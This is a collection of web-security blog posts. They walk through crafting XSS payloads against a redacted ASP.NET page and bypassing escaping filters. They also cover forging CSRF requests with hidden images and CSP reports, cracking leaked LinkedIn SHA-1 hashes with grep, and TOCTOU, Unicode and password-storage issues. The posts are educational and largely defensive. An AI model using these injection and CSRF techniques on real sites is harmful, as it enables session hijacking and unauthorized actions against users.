But browsers have Developer Consoles and Error Consoles that print friendly messages about their activity. Taking a peek at the console output reveals why we haven’t yet succeeded in tossing up the alert() box. The script block still contains syntax errors. And unhappy syntax makes an unhappy hacker. (And a lazy one.)

[14:36:45.923] SyntaxError: function statement requires a name @
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27 SomePage.aspx:345

[14:42:09.681] SyntaxError: syntax error @
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27 SomePage.aspx:345

(3) Capture the Function Body

When we remember to terminate the JavaScript string, we must also remember to capture the syntax that follows the payload. In some cases, you can get away with escaping it with // characters. If you look at the previous code, you’ll notice that we also tried to re-capture the remainder of the string with ;var a =' inside the payload.

What needs to be done is re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to fix this attack, just update the payload with an opening function statement, as below:


The page reflects the payload once again, as shown in the following code. Spaces and carriage returns have been added to make the example easier to read. They’re unnecessary in the wild (you can minify XSS payloads, too).

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a' } alert(9); function(){ var a='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

Almost there. But the pop-up remains elusive.

(4) Var Your Function

Oops. We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but it at least needs a scope for unnamed, anonymous functions. For example, the following syntax creates and executes an anonymous function that generates an alert:


We don’t need to be that fancy, but it’s nice to remember our options. In this case, we’ll assign the function to another var. Happy syntax is executing syntax. And executing syntax kills a site’s security.


Finally, we reach a point where the payload inserts an alert() and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.) Behold the fully exploited page, with spaces added for clarity:

function SetLanCookie() {
    var index = document.getElementById('selectorControl').selectedIndex;
    var lcname = document.getElementById('selectorControl').options[index].value;
    var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a' } alert(9); var a = function(){ var a ='';
    if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){
        var hflanguage = document.getElementById(getClientId().HfLanguage);
        hflanguage.value = '1';
    $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','')

What do you dream of? A world without HTML injection? Electric Sheep?

I wish we could have gotten rid of XSS and SQL injection long ago. I’ve written articles lamenting them. Published books about understanding them. Created scanners to find them. Yet those efforts come and go. All those moments will be lost in time, like tears in rain.

User Agent. Secret Agent. Double Agent.

We hope our browsers are secure in light of the sites we choose to visit. What we often forget, is whether we are secure in light of the sites our browsers choose to visit. Sometimes it’s hard to even figure out whose side our browsers are on.

Browsers act on our behalf, hence the term User Agent. They load HTML from the link we type in the navbar, then retrieve the resources defined in the HTML in order to fully render the site. The resources may be obvious, like images, or behind-the-scenes, like CSS that style the page’s layout or JSON messages sent by XmlHttpRequest objects.

Then there are times when our browsers work on behalf of others, working as a Secret Agent to betray our data. They carry out orders delivered by Cross-Site Request Forgery (CSRF) exploits enabled by the very nature of HTML.

Part of HTML’s success is its capability to aggregate resources from different Origins into a single page. Check out the following HTML. It loads a CSS file, JavaScript functions, and two images from different hosts, all but one over HTTPS. None of it violates the Same Origin Policy. Nor is there an issue with loading different Origins with different SSL connections.

<!doctype html>
<link href="" rel="stylesheet" media="all" type="text/css" />
<script src=""></script>
<script>$(document).ready(function() { $("#main").text("Come together..."); });</script>
<img alt="" src="" />
<img alt="" src="" />
<div id="main" style="font-family: 'Open Sans';"></div>

CSRF attacks rely on being able to include resources from unrelated Origins in a single page. They’re not concerned with the Same Origin Policy since they are neither restricted by it nor need to break it (they don’t need to read or write across Origins). CSRF is concerned with a user’s context in relation to a web app – the data and state transitions associated with a user’s session, security, or privacy.

To get a sense of user context with regard to a site, let’s look at the Bing search engine. Click on the Preferences gear in the upper right corner to review your Search History. You’ll see a list of search terms like the following example:

Bing Search History

Bing’s Search box is an <input> field with parameter name “q”. Searching for a term – and therefore populating the Search History – is done when the form is submitted. Doing so creates a request for a link like this:

For a CSRF exploit to work, it’s important to be able to recreate a user’s request. In the case of Bing, an attacker need only craft a GET request to the /search page and populate the q parameter.

Forge a Request

We’ll use a CSRF attack to populate the user’s Search History without their knowledge. This requires luring the victim to a web page that’s able to forge (as in craft) a search request. If successful, the forged (as in fake) request will affect the user’s context (i.e. the Search History). One way to forge an automatic request is via the src attribute of an img tag. The following HTML would be hosted on some Origin unrelated to Bing, e.g.

<!doctype html>
<img src="" style="visibility: hidden;" alt="" />

The victim has to visit the attacker’s web page or come across the img tag in a discussion forum or social media site. The user does not need to have Bing open in a different browser tab or otherwise be using Bing at the same time they come across the CSRF exploit. Once their browser encounters the booby-trapped page, the request updates their Search History even though they never typed “deadliest web attacks” into the search box.

Bing Search History CSRF

As a thought experiment, extend this from a search history “infection” to a social media status update, or changing an account’s email address (to the attacker’s), or changing a password (to something the attacker knows), or any other action that affects the user’s security or privacy.

The trick is that CSRF requires full knowledge of the request’s parameters in order to successfully forge it. That kind of forgery (as in faking a legitimate request) requires another article to better explore. For example, if you had to supply the old password in order to update a new password, then you wouldn’t need a CSRF attack – just log in with the known password. Or another example, imagine Bing randomly assigned a letter to users’ search requests. One user’s request might use a “q” parameter, whereas another user’s request relies instead on an “s” parameter. If the parameter name didn’t match the one assigned to the user, then Bing would reject the search request. The attacker would have to predict the parameter name. Or, if the sample space were small, fake each possible combination – which would be only 26 letters in this imagined scenario.

Crafty Crafting

We’ll end on the easier aspect of forgery (as in crafting). Browsers automatically load resources from the src attributes of elements like img, iframe, and script (or the href attribute of a link). If an action can be faked by a GET request, that’s the easiest way to go.

HTML5 gives us another nifty way to forge requests using Content Security Policy directives. We’ll invert the expected usage of CSP by intentionally creating an element that violates a restriction. The following HTML defines a CSP rule that forbids src attributes (default-src 'none') and a URL to report rule violations. The victim’s browser must be lured to this page, either through social engineering or by placing it on a commonly-visited site that permits user-uploaded HTML.

<!doctype html>
<meta http-equiv="X-WebKit-CSP" content="default-src 'none'; report-uri" />
<img alt="" src="/" />

The report-uri creates a POST request to the link. Being able to generate a POST is highly attractive for CSRF attacks. However, the usefulness of this technique is tempered by the fact that it’s not possible to add arbitrary name/value pairs to the POST data. The browser will percent-encode the values for the “document-url” and “violated-directive” parameters. Unless the browser incorrectly implements CSP reporting, it’s a half-successful measure at best.

POST /search?q=deadliest%20web%20attacks%20CSP HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17
Content-Length: 121
Origin: null
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

There’s far more to finding and exploiting CSRF vulnerabilities than covered here. We didn’t mention risk, which in this example is low (there’s questionable benefit to the attacker or detriment to the victim, notice you can even turn history off, and the history feature is presented clearly rather than hidden in an obscure privacy setting). But the Bing example demonstrates the essential mechanics of an attack:

  • A site tracks per-user contexts.
  • A request is known to modify that context.
  • The request can be recreated by an attacker (i.e. parameter names and values are predictable without direct access to the victim’s context).
  • The forged request can be placed on a page unrelated to the site (i.e. in a different Origin) where the victim’s browser comes across it.
  • The victim’s browser submits the forged request and affects the user’s context (this usually requires the victim to be currently authenticated to the site).

Later on, we’ll explore attacks that affect a user’s security context and differentiate them from nuisance attacks or attacks with negligible impact to the user. We’ll also examine the forging of requests, including challenges of creating GET and POST requests. Then we’ll heighten those challenges against the attacker and explore ways to counter CSRF attacks.

Until then, consider who your User Agent is really working for. It might not be who you expect.

“We are what we pretend to be, so we must be careful about what we pretend to be.” — Kurt Vonnegut, Introduction to Mother Night.


Effective security boundaries require conclusive checks (data is or is not valid) with well-defined outcomes (access is or is not granted). Yet the passage between boundaries is fraught with danger. As the twin-faced Roman god Janus watched over doors and gates – areas of transition – so does the twin-faced demon of insecurity, TOCTOU, infiltrate web apps.

The TOCTOU demon’s faces watch the state of data or resources within an app. The two sides are named

  • Time of check (TOC) – When the resource is inspected. For example, all data from the browser is considered “tainted” because a malicious user may have manipulated it. If the data passes a validation function, then the taint may be removed and the data permitted entry deeper into the app. For example, the app checks whether an email address is well-formed or text contains <script> tags.
  • Time of use (TOU) – When the app performs an operation on the resource. For example, inserting the data into a SQL statement or inserting text into a web page. Weaknesses occur when the app assumes the state of the resource has not changed since the last check; vulnerabilities occur when the state change relates to a security control.

Boundaries are intended to protect web apps from unauthorized access and malicious data. They may be enforced by programming patterns like parameterized SQL statements that ensure query data cannot corrupt query grammar, or access controls that ensure a user has permission to view data. We see security boundaries when encountering invalid certs. The browser blocks the request with a dire warning of “bad things” might be happening, then asks the user if they want to continue anyway. (As browser boundaries go, that one’s probably the most visible and least effective.)

Ideally, security checks are robust enough to prevent malicious data from entering the app and being used to the attacker’s benefit. But there are subtle problems to avoid in the time between when a resource is checked (TOC) and when the app uses that resource (TOU), specifically duration and transformation.

One way to illustrate a problem in the duration of time between TOC and TOU is in an access control mechanism. User Alice has been granted admin access to a system on Monday. She logs in on Monday and keeps her session active. On Tuesday her access is revoked. But the security check for revoked access only occurs at login time. Since she maintained an active session, her admin rights remain valid.

Another example would be bidding for an item. Alice has a set of tokens with which she can bid. The bidding algorithm requires users to have sufficient tokens before they may bid on an item. In this case, Alice starts off with enough tokens for a bid, but bids with a lower number than her total. The bid is accepted. Then, she bids again with an amount far beyond her total. But the app failed to check the second bid, having already seen that she has more than enough to cover her bid. Or, she could bid the same total on a different item. Now she’s committed more than her total to two different items, which will be problematic if she wins both.

In both cases, state information has changed between the TOC and TOU. The security weakness was not marking the resource as newly tainted upon each change, thereby assuming the outcome of a previous check remained valid. You might apply a technical solution to the first problem: conduct the privilege check upon each use rather than first use (the privilege checks in the Unix sudo command can be configured as never, always, or first use within a specific duration). You might solve the second problem with a policy solution: punish users who fail to meet bids with fines or account suspension. One of the challenges of state transitions is that the app doesn’t always have omniscient perception.

Transformation of data between the TOC and TOU is another potential security weakness. A famous web-related example was the IIS “overlong UTF-8vulnerability from 2000 (famous because it was successfully exploited by worms for months after Microsoft released patches). Web servers must be careful to restrict file access to the web document root. Otherwise, an attacker could use a directory traversal attack to gain unauthorized access to the file system. For example, the IIS vuln was exploited to reach the cmd.exe command if the app’s pages were stored on the same volume as the Windows system32 directory. All the attacker needed to do was submit a URL like the following:\\

Normally, IIS knew enough to limit directory traversals to the document root. However, the %c0%af combination did not appear to be a path separator to the security check, which was unaware of the overlong UTF-8 encoding for the forward slash (/). Thus, IIS received the URL, accepted the path, decoded the characters, then served the resource.

Unchecked data transformation also leads to HTML injection vulnerabilities when the app doesn’t normalize data consistently upon input or encode it properly for output. For example, %22 is a perfectly safe encoding for an href value. But if the %22 is decoded and the href’s value created with string concatenation, then it’s a short step to busting the app’s HTML. Normalization needs to be done carefully to avoid security weaknesses.

TOCTOU problems are usually discussed in terms of file system race conditions, but there’s no reason to limit the concept to file states. Reading source code can be as difficult as decoding Cocteau Twins lyrics. But you should still review your app for important state changes or data transformations and consider whether security controls are sufficient against attacks like input validation bypass, replay, or repudiation:

  • What happens between a security check and a state change?
  • Is the resource a “global”? How are concurrent read/writes handled?
  • How long does the resource live? Is it checked throughout its lifetime, or only on first use?
  • When is data considered tainted?
  • When is it considered safe?
  • When is it normalized?
  • When is it encoded?

January was named after the Roman god Janus. As you look ahead to the new year, consider looking back at your code for situations where TOCTOU problems might occur.

HIQR for the SPQR

Friends, Romans, visitors, lend me your eyes. I’ve added an HTML injection quick reference (HIQR) to the site. It’s not in iambic pentameter, but there’s a certain rhythm to the placement of quotation marks, less-than signs, and alert() functions.

For those unfamiliar with HTML injection (or cross-site scripting in the vulgate), it’s a vulnerability that enables an attacker to modify a page in order to affect the behavior of a victim’s browser. As the name suggests, the attacker injects markup or JavaScript, usually via a form field or querystring parameter, into a string that is then re-displayed by the app. In the worst cases, the app delivers malicious content to anyone who visits the infected page. Insecure string concatenation is the most common programming error that leads to this flaw.

Imagine an app that permits users to write <img> tags in posts to show off cute pictures of spiders. The app expects users to add images with src attributes that point anywhere on the web. For example,

<img src="">

Were users of the app to limit themselves to nicely formed http: or https: schemes, all would be well in the world. However, there’s already trouble brewing in the form of javascript: schemes. For example, a malicious user could inject arbitrary JavaScript into the page – a dangerous situation considering the JavaScript will be executing within the Same Origin Policy of the web app.

<img src="javascript:alert(9)">

Then there’s the trouble with attributes. Even if the site restricted schemes to http: or https: a (not-at-all) devious hacker could add an inline event handler, for example,

<img src="https://&">

Now the attacker has two ways of executing JavaScript in their victim’s browsers – javascript: schemes and event handlers.

There’s more. Suppose the app writes anything the user submits into the web page. We’ll even imagine that the app’s developers have decided to enforce an http: or https: scheme and they only allow visitors to define a src value. In order to be more secure, the web app writes the src value into an element that’s guaranteed to not have any event handlers. This is where string concatenation rears its ugly, insecure head. For example, the hacker submits the following src attribute:


The app pops this value into the src attribute and, presto!, a new element appears. Notice the two characters at the end of the line, ">, these were the intended end of the src attribute and <img> tag, which were subverted by the hacker’s payload:

<img src="https:">alert(9)>">

HTML injection attacks become increasingly complex depending on the context where the payload is rendered, the characters that are stripped or escaped by data validation filters, the patterns used to detect malicious payloads, and the encoding of the payloads and the page.

SPQR (Senātus Populusque Rōmānus) was the Latin abbreviation used to refer to the collective citizens of the Roman empire. Read up on HTML injection and you’ll become SPQH (Senātus Populusque Haxxor) soon enough.


Escape from Normality

Any good John Carpenter fan knows the only way you’ll escape from New York is if Snake Plissken is there to get you out. When it comes to web security, don’t bother waiting around for Kurt Russell’s help. You’re on your own.

Maybe you read a book on web security. Maybe you even remembered some of it. Maybe all you know is how to use escape characters in JavaScript Strings. In any case, maybe you should make sure the maximum security application you’ve created is as strong as you think it is.

The setup is simple: An app has a search box; it accepts queries via parameter q of a form, and rewrites the input box’s value with a one-line JavaScript call. Using JavaScript seems a little more complicated than updating the <input> field’s value directly, which would be as trivial as the following (with “abc” as the search term):

<input id="searchResult" type="text" name="q" value="abc">

It’s not necessarily a bad idea to update the element’s value with JavaScript. Building HTML on the server with string concatenation is a notorious vector for XSS. Writing the value with JavaScript might be more secure than rebuilding the HTML every time because the assignment avoids several encoding problems. This works if you’re keeping the HTML static and trading JSON messages with the server.

On the other hand, if you move the server-side string concatenation from the <input> field to a <script> tag, then you’ve shifted the problem without stepping towards a solution. The <input> field’s value was delimited with quotation marks (“). The JavaScript code uses apostrophes (‘) to delimit the string.

<script type='text/javascript'>
document.getElementById('searchResult').value = 'abc';

Rather than strip apostrophes from the search variable’s value, the developers have decided to escape them with backslashes. Here’s how it’s expected to work when a user searches for abc’.

document.getElementById('searchResult').value = 'abc\\'';

Escaping the payload’s apostrophe preserves the original string delimiters, prevents the JavaScript syntax from being manipulated, and blocks HTML injection attacks. So it seems. What if the escape is escaped? Say, by throwing in a backslash of your own to search for something like abc\‘.

document.getElementById('searchResult').value = 'abc\\\\'';

The developers caught the apostrophe, but missed the backslash. When JavaScript tokenizes the string it sees the escape working on the second backslash instead of the apostrophe. This corrupts the syntax, as follows:

//              ⬇ end of string token
value = 'abc\\\\'';
//               ⬆ dangling apostrophe

From here we just starting throwing HTML injection payloads against the app. JavaScript interprets \\ as a single backslash, accepts the apostrophe as the string terminator, and parses the rest of our payload.**\\';alert(9)//**

document.getElementById('searchResult').value = 'abc\\\\';alert(9)//';

JavaScript’s semantics are lovely from the hacker’s perspective. Here’s an example payload using the String concatenation operator (+) to glue the alert function to the value:**abc\\'%2balert(9)//**

document.getElementById('searchResult').value = 'abc\\\\'+alert(9)//';

Or we could try a payload that uses the modulo operator (%) between the String and our alert.


Maybe the developers added the alert function to a denylist, e.g. a regex for alert\(, by checking for an opening parenthesis. Look up the function in the window object’s property list; this makes it look like a string:


What happens if the denylist contained the word alert altogether? Build the string character by character:


By now we’ve turned an evasion of an escaped apostrophe into an exercise in obfuscation and filter bypasses. Check out the HIQR for more anti-regex patterns and JavaScript obfuscation techniques.

Let’s do a quick recap of some security concepts. In this case, the clear mistake was forgetting all the permutations of escape sequences in a JavaScript string. Here’s an additional checklist:

  • Normalize the data, whether this entails character set conversion, character encoding, substitution, or removal.
  • Apply security checks, preferring inclusion lists over exclusion lists (it’s a lot easier to guess what’s safe than assume what’s dangerous).
  • In the design phase, be suspicious of string concatenation. Figure out if there’s a safer method to bind user-supplied data to HTML.
  • In the design phase, make sure your security check’s assumptions match the context where the data will be written.

Normalization is an important first step. Any time you transform data you should reapply security checks. Snake Plissken was never one for offering advice. Instead, think of The Hitchhiker’s Guide to the Galaxy and recall Trillian’s report as the Infinite Improbability Drive powers down (p. 61):

“…we have normality, I repeat we have normality….Anything you still can’t cope with is therefore your own problem.”

Good luck with normality, and trying to escape the right characters. Security isn’t certain, but one thing is, at least according to Queen. There’s ”no escape from reality.”

Password Interlude in D Minor

While at least one previous post here castigated poor password security, a few others have tried to approach the problem in a more constructive manner. Each of these posts share fundamental themes:

  • Protect the password in transit from the threat of sniffers or intermediation attacks – Use HTTPS during the entire authentication process. HSTS is better. HSTS plus DNSSEC is best.
  • Protect the password in storage to impede the threat of brute force guessing – Never store the plaintext version of the password. Store the salted hash, preferably with PBKDF2. Where possible, hash the password in the browser to further limit the plaintext version’s exposure and minimize developers’ temptation or expectation to work with plaintext. Hashing affects the amount of effort an attacker must expend to obtain the original plaintext password, but it offers little protection for weak passwords. Passwords like [email protected] or lettheright1in are going to be guessed quickly.
  • Protect the password storage from the threat of theft – Balance the attention to hashing passwords with attention to preventing them from being stolen in the first place. This includes (what should be) obvious steps like fixing SQL injection as well as avoiding surprises from areas like logging (such as the login page requests, failed logins), auditing (where password “strength” is checked on the server), and ancillary storage like backups or QA environments.

Implementing PBKDF2 for password protection requires two choices: an HMAC function and number of iterations. For example, WPA2 uses SHA-1 for the HMAC and 4,096 iterations. A review of Apple’s OS X FileVault 2 (used for full disk encryption) reveals that it relies in part on at least 41,000 iterations of SHA-256. RFC 3962 provides some insight, via example, of how to select an iteration count. It’s a trade-off between inducing overhead on the authentication system (authentication still needs to be low-latency from the user’s perspective, and too much time exposes it to easy DoS) versus increasing an attacker’s work effort.

A more sophisticated approach that I haven’t covered yet is the Secure Remote Password (SRP) protocol. SRP introduces a mechanism for password authentication and key exchange; becoming a more secure way to protect the authentication process from passive (e.g. sniffing) and active (e.g. replay, spoofing) attacks. However, the nature of browser security, especially the idea of crypto implemented in JavaScript, adds some interesting wrinkles to the practical security of SRP – not enough to dismiss SRP, just to understand how DNS, mixed-content, and JavaScript’s execution environment may have adverse effects. That’s a topic for another day.

Finally, sites may choose to avoid password management altogether by adopting strategies like OAuth or OpenID. Taking this route doesn’t magically make password-related security problems disappear. Rather than specifically protecting passwords, a site must protect authentication and authorization tokens; it’s still necessary to enforce HTTPS and follow secure programming principles. However, the dangers of direct compromise of a user’s password are greatly reduced.

The state of password security is a sad subject. Like D minor, which is the saddest of all keys.

LinkedIn, HashedOut

Linked-“Be great at what you do”-In, bringing you modern social networking with less than modern password protection – about 1970s UNIX modern. The passwords in this dump not only rejected a robust, well-known password hashing scheme like PBKDF2, they didn’t even salt the passwords]. As a historical reference, salts are something FreeBSD introduced around 1994.

It also appears some users are confused as to what constitutes a good password. Length? Characters? Punctuation? Phrases? An unfortunate number of users went for length, but couldn’t be bothered hitting the shift key, space bar, or one of those numbers above qwerty. I sat down for 20 minutes with shasum and grep – and my bookshelf for inspiration – to guess some possible passwords without restoring to a brute-force dictionary crack.

grep `echo -n myownpassword | shasum | cut -c6-40` SHA1.txt

The grep/shasum trick works on Unix-like command lines. John the Ripper is the usual tool for password cracking without entering the super assembly of GPU customization. And if someone tells you to use node.js instead of Perl, Python, Ruby, or that grep command because a non-blocking IO is faster…just walk away. Walk. Away. Your brain will thank you.

Anyway, I love sci-fi and fantasy as much as the next person. I still run an RPG on a weekly basis; there’s no dust on my polyhedrals. Speaking of RPGs. I started the guesswork with 1st Edition AD&D terms only to strike out after a dozen tries, but your 2nd edition references aren’t bad:

waterdeep – Under Mountain was awesome, unlike your password.

menzoberranzan – Yeah, mister dual-scimitars shows up in the list, too. This single-handedly killed the Ranger class for me. (Er, not before I had about three Rangers with dual longswords; ‘cause that was totally different…)

No one seems to have taken “1stEditionAD&D”. Maybe that’ll be my new password – 14 characters, a number, a symbol, what’s not to love? Aside from this retroactive revelation?

tardis – Come on, that’s not even eight characters. Would tombaker or jonpertwee approve? I don’t think so. But no Wiliam Hartnell? Have you no sense of history? Even for a timelord?

doctorwho – Longer, but…um…we just covered this.

badwolf – Cool, some Jack Harkness fans out there, but still not eight characters.

torchwood – Love the show, but your anagram improves nothing.

kar120c – I’m glad there’s a Prisoner fan out there. It was a cool series with a mind-blowingly bizarre, pontificating, intriguing ending that demands discussion. However, not only is that password short, it even shows up in my book (upcoming edition, too). I should find out who it was and send them a signed copy.

itsatrap – Seriously? You chose a cliched, meme-inducing movie quote that short? And you couldn’t be bothered with an exclamation point at the end? At least you chose a line from the best of the three movies. (No, the last three aren’t worth considering. And, yes, they’re the “last” three because it’s only an “e” away from “least.”)

myprecious – Not anymore.

onering – Onering? While you were out onering your oner a password cracker was cracking your comprehension of LotR. By the way, hackers have also read earthsea, theshining and darktower. Hey, they’ve got good taste.

I adore the Dune books. Dune is in the top list of my favorite books. Seems I’m not the only fan:

benegesserit – Don’t they have some other quotes? Something about fear?

fearisthemindkiller – Heh, even the hackers hadn’t cracked that one yet. Referencing The Litany Against Fear would have been a nice move except that if “fear is the mind killer” then “obvious is the password.”

entersandman, blackened, dyerseve – What are you going to do when you run out of Metallica tracks? Use megadeath? It’s almost sadbuttrue. And jethrotull beat them at the Grammy’s. So, there.

loveiskind – Love is patient, love is kind, hackers aren’t stupid, passwords they find.

h4xx0r – No, probably not.

notmypassword – Actually, it is. At least you didn’t choose a 14-character secretpassword. That would just be dumb.

stevejobs – Now how is he going to change his password?


Music has a universal appeal uninhibited by language. A metal head in Istanbul, Tokyo, or Oslo instinctively knows the deep power chords of Black Sabbath – it takes maybe two beats to recognize a classic like “N.I.B.” or “Paranoid.” The same guitars that screamed the tapping mastery of Van Halen or led to the spandex hair excess of ’80s metal also served The Beatles and Pink Floyd. And before them was Chuck Berry, laying the ground work with the power chords of “Roll Over Beethoven”.

And all this with six strings and five notes: E - A - D - G - B - E. Awesome.

And then there’s the writing on the web. Thousands of symbols, 8 bits, 16 bits, 32 bits. With ASCII, or US-ASCII as RFC 2616 puts it. Or rather ISO-8859-1. But UTF-8 is easier because it’s like an extended ASCII. On the other hand if you’re dealing with GB2312 then UTF-8 isn’t necessarily for you. Of course, in that case you should really be using GBK instead of GB2312. Or was it supposed to be GB18030? I can’t remember.

What a wonderful world of character encodings can be found on the web. And confusion. Our metal head friends like their own genre of müzik / 音楽 / musikk. One word, three languages, and, in this example, one encoding: UTF-8. Programmers need to know programming languages, but they don’t need to know different spoken languages in order to work them into their web sites correctly and securely. (And based on email lists and flame wars I’ve seen, rudimentary knowledge in one spoken language isn’t a prerequisite for some coders.)

You don’t need to speak the language in order to work with its characters, words, and sentences. You just need Unicode. As some random dude (not really) put it, “The W3C was founded to develop common protocols to lead the evolution of the World Wide Web. The path W3C follows to making text on the Web truly global is Unicode. Unicode is fundamental to the work of the W3C; it is a component of W3C Specifications, from the early days of HTML, to the growing XML Family of specifications and beyond.”

Unicode has its learning curve. With Normalization Forms. Characters. Code Units. Glyphs. Collation. And so on. The gist of Unicode is that it’s a universal coding scheme to represent all that’s to come of the characters used for written language; hopefully never to be eclipsed.

The security problems of Unicode stem from the conversion from one character set to another. When home-town fans of 少年ナイフ want to praise their heroes in a site’s comment section, they’ll do so in Japanese. Yet behind the scenes, the browser, web site, or operating systems involved might be handling the characters in UTF-8, Shift-JIS, or EUC.

The conversion of character sets introduces the chance for mistakes and breaking assumptions. The number of bytes might change, leading to a buffer overflow or underflow. The string may no longer be the C-friendly NULL-terminated array. Unsupported characters cause errors, possibly causing an XSS filter to skip over a script tag. A lot of these concerns have been documented (and here). Some even demonstrated as exploitable vulns in the real world (as opposed to conceptual problems that run rampant through security conferences, but never see a decent hack).

Unicode got more popular scrutiny when it was proposed for Internationalized Domain Names (IDN). Researchers warned of “homoglyph” attacks, situations where phishers or malware authors would craft URLs that used alternate characters to spoof popular sites. The first attacks didn’t need IDNs, using trivial tricks like (replacing the letter L with a one, 1). However, IDNs provided more sophistication by allowing domains with harder-to-detect changes like deạ

What hasn’t been well documented (or hasn’t where I could find it) is the range of support for character set encodings in security tools. The primary language of web security seems to be English (at least based on the popular conferences and books). But useful tools come from all over. Wivet originated from Türkiye (here’s some more UTF-8: Web Güvenlik Topluluğu), but it goes easy on scanners in terms of character set support. Sqlmap and w3af support Unicode. So, maybe this is a non-issue for modern tools.

In any case, it never hurts to have more “how to hack” tools in non-English languages or test suites to verify that the latest XSS finder, SQL injector, or web tool can deal with sites that aren’t friendly enough to serve content as UTF-8. Or you could help out with documentation projects like the OWASP Development Guide. Don’t be afraid to care. It would be disastrous if an anti-virus, malware detector, WAF, or scanner was tripped up by encoding issues.

Sometimes translation is really easy. The phrase for “heavy metal” in French is “heavy metal” – although you’d be correct to use “Métal Hurlant” if you were talking about the movie. Character conversion can be easy, too. As long as you stick with a single representation. Once you start to dabble in the Unicode conversions from UTF-8, UTF-16, UTF-32, and beyond you’ll be well-served by keeping up to date on encoding concerns and having tools that spare you the brain damage of implementing everything from scratch.

Parsing .NET ViewState

The JavaScript-based parser has been moved to a github repository.

Background on parsing unencrypted ViewState is here followed by part two.

.NET ViewState Byte Sequences

Byte(s) Explanation
0x02 […] Unsigned integer, compose value from 7 bits of each following byte until leading 8th bit equals 0.
0x0201 == 00000010 00000001 == 1  
0x027f == 00000010 01111111 == 127  
0x028101 == 00000010 10000001 00000001 == 1 + (1 « 7) == 129  
0x02a1b22a == 00000010 10100001 10110010 00101010 == 33 + (98 « 7) + (42 « 14) == 44052769  
0x03 [length] […] Container of [length] Booleans
0x05 [length] […] String, a container of [length] bytes
0x09 RGBA component
0x0B […] 0x00 String, usually NULL-terminated, i.e. read bytes until 0x00.
0x0f Pair (tuple of two objects)
0x10 Triplet (tuple of three objects)
0x15 [length] Array of strings
0x16 [length] Container of objects
0x18 Control state
0x1b [12 bytes] Unit
0x1e [length] […] String (identical to 0x05)
0x1f [number] String reference
0x24 [36 bytes] UUID
0x64 empty node
0x65 empty string
0x66 Number 0
0x67 Boolean true
0x68 Boolean false
0xff01 ViewState preamble
Notes The number of elements in a container is defined by [length], which is one or more bytes interpreted as a number in the manner of 0x02.
A container may be empty, i.e. [length] is 0x00.  

Will the Real APT Please Stand Up?

The Advanced Persistent Threat (APT) is now competing with Cyberwar for reign as security word(s) of the year. It would have been nice if we had given other important words like HTTPS or Prepared Statements their chance to catch enough collective attention to drive security fixes. Alas, we still deal with these fundamental security problems due to Advanced Persistent Ignorance. It’s not wrong to seek out examples of APT, but it helps to have an idea about its nature. Otherwise, we risk seeing the APT boogeyman everywhere.

Threats have agency. They are persons (or even natural events like earthquakes and tsunamis) that take action against your assets (information, network, etc.). An XSS vulnerability in an email site isn’t a threat – the person trying to hijack your account with it is. With this in mind, the term APT helpfully self-describes two important properties:

  • the threat is persistent
  • the threat is advanced

Persistence is uncomplicated. The threat actor has a continuous focus on the target. This doesn’t mean around-the-clock port scanning just waiting for an interesting port to pop up. It means active collection of data about the target as well as development of tools, techniques, and plans once a compromise is attained. Persistent implies patience in searching for “simple” vulns and enumerating resources vulnerable to more sophisticated exploits.

A script-kiddie joyriding the Internet with sqlmap or metasploit looking for anything to attack may be persistent, but the persistence is geared towards finding a vuln rather than finding a vuln in a specific target. It’s the difference between a creepy guy stalking his ex versus a creepy guy hanging out in a bar waiting for someone to get really drunk.

The advanced aspect of a threat leads to more confusion than its persistent aspect. An advanced threat may still exploit simple vulns (e.g. SQL injection). The advanced nature need not even be the nature of the exploit (e.g. using a tool like sqlmap). What may be advanced is the leverage of the exploit. Remember, the threat agent most likely wants to do more than grab passwords from a database. With passwords in hand it’s possible to reach deeper into the target network, steal information, cause disruption, and establish more permanent access than waiting for another buffer overflow to appear.

Stolen passwords are one of the easiest backdoors and the most difficult to detect. Several months ago RSA systems were hacked. Enough information was allegedly stolen that observers at the time imagined it would enable attackers to spoof or otherwise attack SecurID tokens and authentication schemes.

Now it seems those expectations have been met with not one, but two major defense contractors reporting breaches that apparently used SecurID as a vector.

At this point I’m out of solid technical examples of APT. But I don’t want you to leave without a good understanding of what an insidious threat looks like. Let’s turn to the metaphor and allegory of television influenced by the Cold War.

Specifically, The Twilight Zone season 2, episode 28, “Will the Real Martian Please Stand Up” written by the show’s creator, Rod Serling.

Spoilers ahead. I insist you watch the episode before reading further. It’ll be 25 minutes of entertainment you won’t regret.

The set-up of the show is that a Sheriff and his deputy find possible evidence of a crashed UFO, along with very human-like footprints leading from the forested crash site into town.

The two men follow the tracks to a diner where a bus is parked out front. They enter the diner and start to ask if anyone’s seen someone suspicious. You know, like an alien. The bus driver explains the bus is delayed by the weather and they had just stopped at the diner. The lawmen scan the room, “Know how many you had?”


In addition to the driver and the diner’s counterman, Haley, there are seven people in the diner. Two couples, a dandy in a fedora, an old man, and a woman. Ha! Someone’s a Martian in disguise!

What follows are questions, doubt, confusion, and a jukebox. With no clear evidence of who the Martian may be, the lawmen reluctantly give up and allow everyone to depart. The passengers reload the bus1. The sheriff and his deputy leave. The bus drives away.

But this is the Twilight Zone. It wouldn’t leave you with a such a simple parable of paranoia; there’s always a catch.

